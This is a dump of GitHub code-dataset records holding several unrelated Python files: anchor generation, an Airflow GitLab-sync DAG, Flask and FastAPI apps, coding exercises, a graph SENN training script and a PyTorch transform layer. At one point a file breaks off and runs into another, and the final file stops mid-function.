@staticmethod\n def generate_anchors(height, width, stride=16, scales=(8,16,32), ratios=(0.5,1,2)):\n a = Anchor(ratios=np.array(ratios), scales=np.array(scales))\n anchors = a.generate()\n A = anchors.shape[0]\n shift_x = np.arange(0, width) * 16\n shift_y = np.arange(0, height) * 16\n shift_x, shift_y = np.meshgrid(shift_x, shift_y)\n shifts = np.vstack((shift_x.ravel(), shift_y.ravel(), shift_x.ravel(), shift_y.ravel())).transpose()\n K = shifts.shape[0]\n anchors = anchors.reshape((1,A, 4)) + shifts.reshape((1,K,4)).transpose((1,0,2))\n anchors = anchors.reshape((K * A, 4)).astype(np.float32, copy=False)\n length = np.int32(anchors.shape[0])\n return anchors, length\n\n ","repo_name":"ltenny/rsna","sub_path":"utils/anchor.py","file_name":"anchor.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70278075206","text":"import pendulum\nfrom airflow.decorators import dag, task\nfrom airflow.models import Variable\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\nfrom airflow.providers.postgres.operators.postgres import PostgresOperator\n\nfrom update_gitlab_issues import update_issues\n\n\n@task\ndef load_issues_from_api():\n base_url = Variable.get('GITLAB_URL')\n token = Variable.get('GITLAB_API_TOKEN')\n\n pg_hook = PostgresHook(postgres_conn_id='KabanPostgres')\n\n with pg_hook.get_conn() as pg_conn:\n update_issues(base_url=base_url, token=token, pg_conn=pg_conn)\n\n\n@dag(\n schedule_interval=\"@hourly\",\n start_date=pendulum.datetime(2022, 12, 23, tz=\"Europe/Moscow\"),\n is_paused_upon_creation=True,\n catchup=False,\n tags=[\"Kaban\"],\n)\ndef update_issues_status_dag():\n\n load_task = load_issues_from_api()\n\n update_issues_status_task = PostgresOperator(\n task_id='update_issues_status',\n sql='sql/update_issues_status_info.sql',\n postgres_conn_id='KabanPostgres',\n )\n\n update_issues_status_task.set_upstream(load_task)\n\n\nupdate_issues_status_dag()\n","repo_name":"Jud1cator/Kaban","sub_path":"dags/update_issues_status_dag.py","file_name":"update_issues_status_dag.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"99"} +{"seq_id":"9587278327","text":"import json\r\n\r\nimport pandas as pd\r\nimport plotly\r\nimport plotly.express as px\r\nfrom flask import Flask, redirect, render_template, url_for, request\r\n\r\nfrom .activity import Activity\r\nfrom .logfile import load_logfile, save_logfile\r\nfrom .summary import get_cpd_summary\r\n\r\napp = Flask(__name__)\r\n\r\n\r\ndef build_quarters_graph_json(quarter_totals: dict):\r\n df = pd.DataFrame(list(quarter_totals.items()), columns=[\"Quarter\", \"Hours\"])\r\n fig = px.bar(df, x=\"Quarter\", y=\"Hours\")\r\n fig.add_shape(\r\n type=\"line\",\r\n xref=\"paper\",\r\n x0=0,\r\n x1=1,\r\n yref=\"y\",\r\n y0=12.5,\r\n y1=12.5,\r\n line=dict(color=\"Red\", dash=\"dot\"),\r\n )\r\n return json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\r\n\r\n\r\ndef build_types_graph_json(cpd_type_totals: dict):\r\n df = pd.DataFrame(list(cpd_type_totals.items()), columns=[\"CPD Type\", \"Hours\"])\r\n fig = px.bar(df, y=\"CPD Type\", x=\"Hours\", orientation=\"h\")\r\n return json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\r\n\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n logfile = app.config[\"logfile\"]\r\n activities = load_logfile(logfile)\r\n summary = get_cpd_summary(logfile, years=3)\r\n summary2 = get_cpd_summary(logfile, years=2)\r\n expiring = summary[\"total_hours\"] - summary2[\"total_hours\"]\r\n quarters_graph_json = build_quarters_graph_json(summary[\"quarter_totals\"])\r\n types_graph_json = build_types_graph_json(summary[\"cpd_type_totals\"])\r\n return render_template(\r\n \"index.html\",\r\n logfile=logfile,\r\n activities=activities,\r\n summary=summary,\r\n expiring=expiring,\r\n quarters_graph_json=quarters_graph_json,\r\n types_graph_json=types_graph_json,\r\n )\r\n\r\n\r\n@app.route(\"/new_activity\", methods=[\"POST\"])\r\ndef new_activity():\r\n \"\"\"Create new CPD activity\"\"\"\r\n logfile = app.config[\"logfile\"]\r\n act = Activity(\r\n act_date=request.form[\"date\"],\r\n topic=request.form[\"topic\"],\r\n cpd_hours=request.form[\"duration\"],\r\n cpd_type=request.form[\"cpd_category\"],\r\n technical=request.form[\"technical\"],\r\n provider=request.form[\"provider\"],\r\n learning_outcome=request.form[\"learning_outcome\"],\r\n notes=request.form[\"notes\"],\r\n )\r\n save_logfile(logfile, activities=[act], append=True)\r\n return redirect(url_for(\"home\"))\r\n","repo_name":"aguinane/CPDLog","sub_path":"cpdlog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"6378511833","text":"\ndef sortzeroonetwo(arr,n):\n next=0\n for i in range(n):\n if arr[i]==0:\n temp=arr[i]\n arr[i]=arr[next]\n arr[next]=temp\n next+=1\n \n for j in range(next,n):\n if arr[j]==1:\n temp=arr[j]\n arr[j]=arr[next]\n arr[next]=temp\n next+=1\n\n\n\n\n\n\n# taking input\nsize=int(input(\"Enter size of list : \"))\nprint(\"input list \")\nlist=input().split()\n\narr=[]\n\nfor i in range(size):\n arr.append(int(list[i]))\n\n# calling finction\n\nsortzeroonetwo(arr,size)\nprint(arr)","repo_name":"Lalitmax/Basics_Of_Python","sub_path":"class practice question/Sort 0 1 3 .py","file_name":"Sort 0 1 3 .py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"8756643994","text":"import argparse\nimport os.path\nimport traceback\nfrom contextlib import nullcontext\nfrom datetime import datetime\nfrom types import SimpleNamespace\nfrom typing import Any, Tuple\nimport re\n\nimport torch\nimport torch.nn.functional as F\nimport wandb\nfrom torch_geometric.loader import DataLoader\nfrom torch_geometric.nn import GCNConv, GATConv\nfrom tqdm import tqdm\n\nimport custom_logger\nimport datasets\nfrom custom_logger import log\nfrom decoders import AdjGenerationType, FullyConnectedMessagePassingDecoder\nfrom graph_senn import GraphSENN\nfrom pooling_layers import StandardPoolingLayer, GraphSENNPool\n\nCONV_TYPES = [GCNConv, GATConv]\n\ndef train_test_epoch(train: bool, model: GraphSENN, optimizer, loader: DataLoader, epoch: int, mode_str: str):\n if train:\n model.train()\n else:\n model.eval()\n correct = 0\n sum_loss = 0\n sum_class_loss = 0\n sum_reg_loss = 0\n sum_add_loss = {}\n num_classes = model.output_dim\n class_counts = torch.zeros(num_classes)\n with nullcontext() if train else torch.no_grad():\n for data in loader:\n data = data.to(custom_logger.device)\n batch_size = data.y.size(0)\n if train:\n optimizer.zero_grad()\n\n annotations = data.annotations if hasattr(data, \"annotations\") else None\n out, x_out, theta, h = model(data.x, data.edge_index, data.batch, annotations)\n target = data.y\n classification_loss = F.nll_loss(out, target)\n reg_loss, add_loss_dict = model.pooling_layer.calculate_additional_losses(model, data.x, x_out, data.batch,\n data.edge_index, theta, h,\n batch_size)\n\n loss = classification_loss + reg_loss\n if torch.isnan(loss).item():\n raise ValueError(\"NaN encountered during training!\")\n\n sum_loss += batch_size * float(loss)\n sum_class_loss += batch_size * classification_loss\n sum_reg_loss += batch_size * reg_loss\n for k, v in add_loss_dict.items():\n sum_add_loss[k] = sum_add_loss.get(k, 0) + batch_size * v\n\n pred_classes = out.argmax(dim=1)\n correct += int((pred_classes == target).sum())\n class_counts += torch.bincount(pred_classes.detach(), minlength=num_classes).cpu()\n\n if train:\n loss.backward()\n optimizer.step()\n dataset_len = len(loader.dataset)\n distr_dict = {}\n class_counts /= dataset_len\n if mode_str == \"test\":\n distr_dict = {f\"{mode_str}_percentage_class_{i}\": class_counts[i] for i in range(num_classes)}\n res_dict = {\n f\"{mode_str}_loss\": sum_loss / dataset_len,\n f\"{mode_str}_class_loss\": sum_class_loss / dataset_len,\n f\"{mode_str}_reg_loss\": sum_reg_loss / dataset_len,\n f\"{mode_str}_accuracy\": correct / dataset_len,\n **{f\"{mode_str}_{k}\": v / dataset_len for k, v in sum_add_loss.items()},\n **distr_dict}\n log(res_dict, step=epoch)\n return res_dict\n\ndef main(args, **kwargs) -> Tuple[GraphSENN, Any, DataLoader, DataLoader, DataLoader]:\n \"\"\"\n :param args: The configuration as defined by the commandline arguments\n :param kwargs: additional kwargs to overwrite a loaded config with\n :return: The loaded/trained model, train and test data\n \"\"\"\n if not isinstance(args, dict):\n args = args.__dict__\n restore_path = None\n if args[\"resume\"] is not None:\n api = wandb.Api()\n run_path = f\"{custom_logger.wandb_entity}/{custom_logger.wandb_project}/\" + args[\"resume\"]\n run = api.run(run_path)\n save_path = args[\"save_path\"]\n args = run.config\n restore_path = args[\"save_path\"]\n if args[\"save_wandb\"] and not os.path.isfile(restore_path):\n print(\"Downloading checkpoint from wandb...\")\n wandb.restore(restore_path, run_path=run_path)\n args[\"save_path\"] = save_path\n for k, v in kwargs.items():\n args[k] = v\n else:\n if not args[\"use_wandb\"] and args[\"save_wandb\"]:\n print(\"Disabling saving to wandb as logging to wandb is also disabled.\")\n args[\"save_wandb\"] = False\n\n if isinstance(args, dict):\n args = SimpleNamespace(**args)\n\n args = custom_logger.init(args)\n\n device = torch.device(args.device)\n custom_logger.device = device\n torch.manual_seed(args.seed)\n\n data_wrapper = datasets.from_name(args.dataset)\n dataset = data_wrapper.dataset\n num_classes = data_wrapper.num_classes\n num_node_features = data_wrapper.num_node_features\n num_train_samples = int(args.train_split * len(dataset))\n num_val_samples = int(args.val_split * len(dataset))\n train_data = dataset[:num_train_samples]\n val_data = dataset[num_train_samples:num_train_samples+num_val_samples]\n test_data = dataset[num_train_samples + num_val_samples:]\n graphs_to_log = train_data[:args.graphs_to_log] + test_data[:args.graphs_to_log]\n\n train_loader = DataLoader(train_data, batch_size=args.batch_size, shuffle=kwargs.get(\"shuffle\", True))\n val_loader = DataLoader(val_data, batch_size=args.batch_size, shuffle=kwargs.get(\"shuffle\", True))\n test_loader = DataLoader(test_data, batch_size=args.batch_size, shuffle=kwargs.get(\"shuffle\", True))\n log_graph_loader = DataLoader(graphs_to_log, batch_size=1, shuffle=False)\n\n conv_type = next((x for x in CONV_TYPES if x.__name__ == args.conv_type), None)\n if conv_type is None:\n raise ValueError(f\"No convolution type named \\\"{args.conv_type}\\\" found!\")\n gnn_activation = getattr(torch.nn, args.gnn_activation)\n\n gnn_output_size = args.gnn_sizes[-1] if args.gnn_sizes else num_node_features\n if args.senn_pooling:\n if args.feat_reconst_loss_weight != 0 or args.adj_reconst_loss_weight != 0:\n decoder = FullyConnectedMessagePassingDecoder(args.gnn_sizes, num_node_features, \"SAGEConv\", gnn_activation,\n args.h_adj_dec_intermediate, args.h_adj_dec_final)\n else:\n decoder = None\n pool = GraphSENNPool(gnn_output_size, num_classes, args.theta_sizes, args.h_sizes, args.aggregation,\n args.per_class_theta, args.per_class_h, args.global_theta, args.theta_loss_weight,\n args.feat_reconst_loss_weight, args.adj_reconst_loss_weight, decoder, True) # args.learn_h)\n else:\n pool = StandardPoolingLayer(gnn_output_size, num_classes, args.out_sizes, args.aggregation)\n\n\n model = GraphSENN(args.gnn_sizes, num_node_features, num_classes, conv_type, gnn_activation, pool,\n args.concept_activation)\n if restore_path is not None:\n model.load_state_dict(torch.load(restore_path))\n model = model.to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd)\n\n os.makedirs(os.path.dirname(args.save_path), exist_ok=True)\n best_val_acc = 0\n try:\n for epoch in tqdm(range(args.num_epochs)):\n train_test_epoch(True, model, optimizer, train_loader, epoch, \"train\")\n train_test_epoch(False, model, optimizer, val_loader, epoch, \"test\")\n val_acc = train_test_epoch(False, model, optimizer, test_loader, epoch, \"val\")[\"val_accuracy\"]\n if epoch % args.graph_log_freq == 0:\n pass\n if (args.save_freq > 0 and epoch % args.save_freq == 0) or\\\n (args.save_freq == -2 and val_acc > best_val_acc):\n torch.save(model.state_dict(), args.save_path)\n if args.save_wandb:\n wandb.save(args.save_path, policy=\"now\")\n if args.save_freq == -2:\n print(f\"Validation accuracy {100 * val_acc:.2f}%. Saving.\")\n best_val_acc = max(val_acc, best_val_acc)\n if args.num_epochs > 0:\n log({\"best_val_acc\": best_val_acc}, step=epoch)\n except:\n log({\"best_val_acc\": -1}, step=epoch)\n traceback.print_exc()\n\n return model, args, train_loader, val_loader, test_loader\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # Training Details\n parser.add_argument('--lr', type=float, default=0.001,\n help='The Adam learning rate to use.')\n parser.add_argument('--wd', type=float, default=5e-4,\n help='The Adam weight decay to use.')\n parser.add_argument('--num_epochs', type=int, default=1500,\n help='The number of epochs to train for.')\n parser.add_argument('--batch_size', type=int, default=64,\n help='The batch size to use.')\n\n # Architecture\n parser.add_argument('--gnn_sizes', type=int, nargs='*',\n default=[32, 32, 32], dest='gnn_sizes',\n help='The layer sizes to use for the GNN.')\n parser.add_argument('--conv_type', type=str, default=\"GCNConv\", choices=[c.__name__ for c in CONV_TYPES],\n help='The type of graph convolution to use. Note: GATConv does not appear to work with h loss.')\n parser.add_argument('--gnn_activation', type=str, default=\"LeakyReLU\",\n help='Activation function to be used in between the GNN layers')\n parser.add_argument('--aggregation', type=str, default=\"Sum\", choices=[\"Sum\", \"Mean\", \"Max\", \"Min\", \"Mul\", \"Var\",\n \"Std\", \"Softmax\", \"PowerMean\"],\n help='The aggregation function to use over all nodes in the output layer.')\n parser.add_argument('--senn_pooling', action='store_true', help=\"Whether to use our SENN pooling. Baseline \"\n \"otherwise.\")\n parser.add_argument('--no-senn_pooling', dest='senn_pooling', action='store_false')\n parser.set_defaults(senn_pooling=True)\n\n # SENN\n\n parser.add_argument('--concept_activation', type=str, default=\"none\",\n choices=[\"none\", \"sigmoid\", \"softmax\", \"gumbel_softmax\", \"gumbel_softmax_soft\"],\n help='The function applied to the last node embeddings before they serve as input to the h/'\n 'theta networks.')\n\n # h\n parser.add_argument('--h_sizes', type=int, nargs='*',\n default=[128, 1], dest='h_sizes',\n help='The layer sizes to use for the h network. Can be empty for identity (of last embedding).')\n parser.add_argument('--per_class_h', action='store_true', help=\"Whether to use a different concept scalar h per \"\n \"class or the same one for all.\")\n parser.add_argument('--no-per_class_h', dest='per_class_h', action='store_false')\n parser.set_defaults(per_class_h=False)\n parser.add_argument('--feat_reconst_loss_weight', type=float, default=0,\n help='The weight of the feature reconstruction in the reconstruction loss.')\n parser.add_argument('--adj_reconst_loss_weight', type=float, default=0,\n help='The weight of the adjacency reconstruction in the reconstruction loss.')\n parser.add_argument('--h_adj_dec_intermediate', type=str, default=AdjGenerationType.IDENTITY.value,\n choices=[v.value for v in AdjGenerationType.__members__.values()],\n help='The type of adjacency reconstruction in intermediate layers when using the '\n 'FullyConnectedMessagePassingDecoder for the h loss.')\n parser.add_argument('--h_adj_dec_final', type=str, default=AdjGenerationType.MLP.value,\n choices=[v.value for v in AdjGenerationType.__members__.values()],\n help='The type of adjacency reconstruction for the final output when using the '\n 'FullyConnectedMessagePassingDecoder for the h loss.')\n parser.add_argument('--learn_h', action='store_true', help=\"Whether to learn h from the GNN output. Otherwise will \"\n \"use one-hot vector of ground truth annotations \"\n \"(assuming they are present and fit)\")\n parser.add_argument('--no-learn_h', dest='learn_h', action='store_false')\n parser.set_defaults(learn_h=True)\n\n # Theta\n parser.add_argument('--theta_sizes', type=int, nargs='*',\n default=[128, 4], dest='theta_sizes',\n help='The layer sizes to use for theta network. Can be empty for identity (of last embedding).')\n parser.add_argument('--per_class_theta', action='store_true', help=\"Whether to use a different concept weight theta\"\n \" per class (this is what SENN does) or the same\"\n \" one for all.\")\n parser.add_argument('--no-per_class_theta', dest='per_class_theta', action='store_false')\n parser.set_defaults(per_class_theta=True)\n parser.add_argument('--global_theta', action='store_true', help=\"Whether to generate theta globally, i.e. \"\n \"concatenate a globally pooled embedding to the \"\n \"node embedding when generating theta.\")\n parser.add_argument('--no-global_theta', dest='global_theta', action='store_false')\n parser.set_defaults(global_theta=False) # This reassembles an attention mechanism\n parser.add_argument('--theta_loss_weight', type=float, default=0,\n help='The weight lambda of the theta regularization loss.')\n\n # No SENN\n parser.add_argument('--out_sizes', type=int, nargs='*',\n default=[128, 4], dest='out_sizes',\n help='The layer sizes to use for the network after aggregation when not using SENN.')\n\n\n # Dataset\n parser.add_argument('--dataset', type=str, default=\"UNIQUE-MOTIF\", choices=[re.sub(r'(? 5) or any(data[\"stars\"] < 1):\n return 'stars should be betwin 1 and 5.\\n'\n data = data.rename(columns={'stars':'review_stars', 'title':'review_title', 'review':'review_content'})\n tml = Train_master_learning()\n return '{\\n\\n\\t'+ '\"prediction\" : {}, \\n\\t\"score\" : {} '.format(tml.predict(data), tml.score) + '\\n\\n}\\n'\n\nif __name__ == '__main__':\n app.run()","repo_name":"lesueur-philippe/Big-Data","sub_path":"Lesueur_Philippe_train_master_rendu/main/API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11260598170","text":"import os\n\ndef gradingStudents(grades):\n r=[]\n for i in grades:\n if i>=38 and i%5>=3:\n r.append(i+5-round(i%5))\n else:\n r.append(i)\n\n return(r)\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n grades_count = int(input().strip())\n grades = []\n for _ in range(grades_count):\n grades_item = int(input().strip())\n grades.append(grades_item)\n result = gradingStudents(grades)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n fptr.close()\n","repo_name":"imPatidar/HackerRankPythonProblems","sub_path":"gradingStudents.py","file_name":"gradingStudents.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"18452563409","text":"class Dashboard:\n def __init__(self, accountId = 0, accountBalance=0, interestPaid=0, accruedInterest=0):\n self.accountId = accountId\n self.accountBalance = accountBalance\n self.interestPaid = interestPaid\n self.accruedInterest = accruedInterest\n\nclass UserTransaction:\n def __init__(self, transactionId = 0, userId = 0, transactionAmt=None, transactionType=None, transactionDate=None):\n self.transactionId = transactionId\n self.userId = userId\n self.transactionAmt = transactionAmt\n self.transactionType = transactionType\n self.transactionDate = transactionDate\n","repo_name":"dbajollari1/lynx","sub_path":"lynx/lynx/dashboard/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"36782481580","text":"import json\nimport asyncio\nimport astropy\n\nfrom astropy.io import fits\n\n\nasync def extract_fits_header(filepath, loop=None):\n if not loop:\n loop = asyncio.get_event_loop()\n handle = await loop.run_in_executor(None, fits.open, filepath)\n hdr_dict = {}\n hdr = handle[0].header\n for key in hdr.keys():\n value = hdr[key]\n if isinstance(value, astropy.io.fits.header._HeaderCommentaryCards):\n value = [i for i in value]\n hdr_dict[key] = value\n return hdr_dict\n","repo_name":"AusSRC/SoFiAX","sub_path":"sofiax/fits.py","file_name":"fits.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"7626305990","text":"from fastapi import FastAPI, HTTPException\nfrom pydantic import BaseModel\nimport sqlite3\nimport os\n\napp = FastAPI()\n\n# Connessione al database\ndb_path = os.path.abspath('../database/sqlite/db.sqlite')\n\ndef connect_db():\n return sqlite3.connect(db_path)\n\nclass Customer(BaseModel):\n Customer_ID: int\n Age: int\n Gender: str\n Item_Purchased: str\n Category: str\n Purchase_Amount: float\n Location: str\n Size: str\n Color: str\n Season: str\n Review_Rating: float\n Subscription_Status: str\n Payment_Method: str\n Shipping_Type: str\n Discount_Applied: str\n Promo_Code_Used: str\n Previous_Purchases: int\n Preferred_Payment_Method: str\n Frequency_of_Purchases: str\n\n#GET \n\n@app.get('/customers', response_model=list[Customer])\nasync def get_all_customers():\n conn = None # Move this line to here\n\n try:\n conn = connect_db()\n cursor = conn.cursor()\n\n cursor.execute('SELECT * FROM CustomerData')\n customers = cursor.fetchall()\n\n customer_list = [Customer(\n Customer_ID=row[0], Age=row[1], Gender=row[2], Item_Purchased=row[3],\n Category=row[4], Purchase_Amount=row[5], Location=row[6],\n Size=row[7], Color=row[8], Season=row[9], Review_Rating=row[10],\n Subscription_Status=row[11], Payment_Method=row[12], Shipping_Type=row[13],\n Discount_Applied=row[14], Promo_Code_Used=row[15], Previous_Purchases=row[16],\n Preferred_Payment_Method=row[17], Frequency_of_Purchases=row[18]\n ) for row in customers]\n\n return customer_list\n\n except sqlite3.Error as e:\n raise HTTPException(status_code=500, detail=f'SQLite error: {e}')\n\n finally:\n if conn:\n conn.close()\n\n#POST\n\n@app.post('/customers', response_model=Customer)\nasync def create_customer(customer: Customer):\n try:\n conn = connect_db()\n cursor = conn.cursor()\n\n # Assuming CustomerData table structure: (Customer_ID, Age, Gender, ...)\n cursor.execute(\"\"\"\n INSERT INTO CustomerData\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\n \"\"\", (\n customer.Customer_ID, customer.Age, customer.Gender, customer.Item_Purchased,\n customer.Category, customer.Purchase_Amount, customer.Location,\n customer.Size, customer.Color, customer.Season, customer.Review_Rating,\n customer.Subscription_Status, customer.Payment_Method, customer.Shipping_Type,\n customer.Discount_Applied, customer.Promo_Code_Used, customer.Previous_Purchases,\n customer.Preferred_Payment_Method, customer.Frequency_of_Purchases\n ))\n\n conn.commit()\n\n return customer\n\n except sqlite3.Error as e:\n raise HTTPException(status_code=500, detail=f'SQLite error: {e}')\n\n finally:\n if conn:\n conn.close()\n\n # PUT \n@app.put('/customers/{customer_id}', response_model=Customer)\nasync def update_customer(customer_id: int, customer: Customer):\n try:\n conn = connect_db()\n cursor = conn.cursor()\n\n cursor.execute(\"\"\"\n UPDATE CustomerData\n SET Age=?, Gender=?, Item_Purchased=?, Category=?, Purchase_Amount=?,\n Location=?, Size=?, Color=?, Season=?, Review_Rating=?, Subscription_Status=?,\n Payment_Method=?, Shipping_Type=?, Discount_Applied=?, Promo_Code_Used=?,\n Previous_Purchases=?, Preferred_Payment_Method=?, Frequency_of_Purchases=?\n WHERE Customer_ID=?\n \"\"\", (\n customer.Age, customer.Gender, customer.Item_Purchased,\n customer.Category, customer.Purchase_Amount, customer.Location,\n customer.Size, customer.Color, customer.Season, customer.Review_Rating,\n customer.Subscription_Status, customer.Payment_Method, customer.Shipping_Type,\n customer.Discount_Applied, customer.Promo_Code_Used, customer.Previous_Purchases,\n customer.Preferred_Payment_Method, customer.Frequency_of_Purchases, customer_id\n ))\n\n conn.commit()\n\n return customer\n\n except sqlite3.Error as e:\n raise HTTPException(status_code=500, detail=f'SQLite error: {e}')\n\n finally:\n if conn:\n conn.close()\n\n# DELETE \n@app.delete('/customers/{customer_id}', response_model=dict)\nasync def delete_customer(customer_id: int):\n try:\n conn = connect_db()\n cursor = conn.cursor()\n\n # Assuming CustomerData table structure: (Customer_ID, Age, Gender, ...)\n cursor.execute(\"DELETE FROM CustomerData WHERE Customer_ID=?\", (customer_id,))\n conn.commit()\n\n return {\"message\": f\"Customer {customer_id} deleted successfully\"}\n\n except sqlite3.Error as e:\n raise HTTPException(status_code=500, detail=f'SQLite error: {e}')\n\n finally:\n if conn:\n conn.close()\n\n\n","repo_name":"ErGiacky/DataAnaliticsMachineLearningExam","sub_path":"database/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10449062874","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'diagonalDifference' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts 2D_INTEGER_ARRAY arr as parameter.\n#\n\n#program is not completed\n\n\ndef diagonalDifference(arr):\n # Write your code here\n print('ho')\n differnce = 0\n leftDiagonalSum = 0\n rightDiagonalSum = 0\n\n for i in range(0, len(arr)):\n for j in range(0, len(arr)):\n if(i == j):\n leftDiagonalSum = leftDiagonalSum + arr[i][j]\n if(i+j == (len(arr) - 1)):\n print(arr[i][j])\n rightDiagonalSum = rightDiagonalSum + arr[i][j]\n\n print(leftDiagonalSum, rightDiagonalSum)\n\n differnce = abs(leftDiagonalSum - rightDiagonalSum)\n\n return differnce\n\n\nif __name__ == '__main__':\n # fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n # n = int(input(\"Enter the number of rows:\"))\n\n # Initialize matrix\n matrix = []\n # print(\"Enter the entries rowwise:\")\n\n # For user input\n # for i in range(n): # A for loop for row entries\n # a = []\n # for j in range(n): # A for loop for column entries\n # a.append(int(input()))\n # matrix.append(a)\n\n # print(matrix)\n\n matrix5 = [[11, 2, 4], [4, 5, 6], [10, 8, -12]]\n\n print('answer', diagonalDifference(matrix5))\n\n # fptr.write(str(result) + '\\n')\n\n # fptr.close()\n\n# 11 2 4\n# 4 5 6\n# 10 8 -12\n","repo_name":"shelcia/InterviewQuestionPython","sub_path":"ArrayPrograms/diagonalDifference.py","file_name":"diagonalDifference.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"28445778833","text":"\nfrom django.conf.urls import patterns, url\nfrom report import views\n\nurlpatterns = patterns(\"\",\n url(r\"^FT/(?P\\w+)/$\", views.showTableFT),\n url(r\"^FT/(?P\\w+)/(?P\\w+%?)/$\", views.showTableFT),\n url(r\"^Repoos/(?P\\w+)/$\", views.showTableRep),\n url(r\"^Repoos/(?P\\w+)/Repoos/(?P\\w+%?)/$\", views.showTableRep),\n )\n\n","repo_name":"weichetaru/charttest","sub_path":"kpidashboard/report/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10150862944","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.linalg import hadamard, block_diag\n\n__all__ = [\"HarmonicBlock\", \"HadamardBlock\", \"SlantBlock\"]\n\n\nclass TransformBlock(nn.Module):\n def __init__(\n self,\n input_channels,\n output_channels,\n bn=True,\n dropout=False,\n kernel_size=3,\n padding=1,\n stride=1,\n alpha_root=None,\n add_noise=False,\n lmbda=None,\n diag=False,\n bias=False,\n use_res=True,\n ):\n super().__init__()\n self._cuda = torch.cuda.is_available()\n self.bn = bn # flag for batchnorm (True/False)\n self.drop = dropout # flag for dropout (True/False)\n self.input_channels = input_channels\n self.output_channels = output_channels\n self.padding = padding\n self.stride = stride\n self.kernel_size = kernel_size\n self.bias = bias # flag for bias\n self.diag = diag # select only diagonal filters\n self.use_res = use_res # use residual connection or not\n self.alpha_root = alpha_root # use rooting, i.e. (input.pow(alpha))\n # Filters based on transform\n self.filter_bank = None\n # Linear Combination conv\n self.conv = None\n # Shortcut is the downsampling layer. It preserves the input info\n self.shortcut = nn.Identity()\n # if use_res is False,\n # it is just identity mapping\n if (input_channels != output_channels or stride != 1) and self.use_res:\n ks = 2 if self.kernel_size % 2 == 0 else 1\n p = 1 if ks == 2 else 0\n self.shortcut = nn.Sequential(\n nn.Conv2d(\n input_channels,\n output_channels,\n padding=p,\n kernel_size=ks,\n stride=stride,\n bias=False,\n ),\n nn.BatchNorm2d(output_channels),\n )\n\n if add_noise:\n self.noise = nn.Parameter(\n nn.init.normal_(\n torch.randn(1, self.filter_bank.size(0)), std=1e-4\n )\n )\n else:\n self.noise = None\n if lmbda is not None:\n # limits the number of kernels\n self.lmbda = min(lmbda, self.kernel_size ** 2)\n else:\n self.lmbda = lmbda\n\n \"\"\"\n Base class for any tranform-based layer.\n Main idea: compute window-based transform from each channel,\n combine linearly through 1x1 convolution.\n Class allows use of residual connection as in ResNets.\n \"\"\"\n\n @classmethod\n def get_idx(self, ker: int, lmbda: int):\n \"\"\"Return indices for partial filter usage, see Ulicny et al. 2018.\"\"\"\n out = []\n for i in range(ker):\n for j in range(ker):\n if i + j < lmbda:\n out.append(ker * i + j)\n return tuple(out)\n\n @classmethod\n def get_idx_diag(self, ker):\n \"\"\"Return only diagonal indices for partial filter usage.\"\"\"\n out = []\n for i in range(ker):\n for j in range(ker):\n if i == j:\n out.append(i + j)\n return tuple(out)\n\n @classmethod\n def draw_filters(self, fb_=None, figsize=(12, 4)):\n \"\"\"Display visual representation of all filters as a grid.\n\n Parameters:\n fb_: any filter bank to display. If `None` is passed,\n the default filter bank of the class is shown.\n This argument must comply with PyTorch's weight shapes.\n figsize: a 2-tuple of integers, compatible with `figsize` of\n `matplotlib.pyplot`\n \"\"\"\n if not fb_:\n fb_ = self.filter_bank\n fig, ax = plt.subplots(len(fb_), 1, figsize=figsize)\n for i in range(len(fb_)):\n ax[i].imshow(fb_[i, 0, :, :])\n ax[i].axis(\"off\")\n ax[i].grid(False)\n\n def filter_from_matrix(self, i, j, size):\n raise NotImplementedError\n\n def get_filter_bank(\n self, kernel_size, input_channels=3, lmbda=None, diag=False, **kwargs\n ):\n \"\"\"Build filter bank from a matrix.\n\n Parameters:\n :kernel_size: integer, determines sizes of filters.\n input\n \"\"\"\n filter_bank = torch.zeros(\n (kernel_size, kernel_size, kernel_size, kernel_size)\n )\n for i in range(kernel_size):\n for j in range(kernel_size):\n filter_bank[i, j, :, :] = 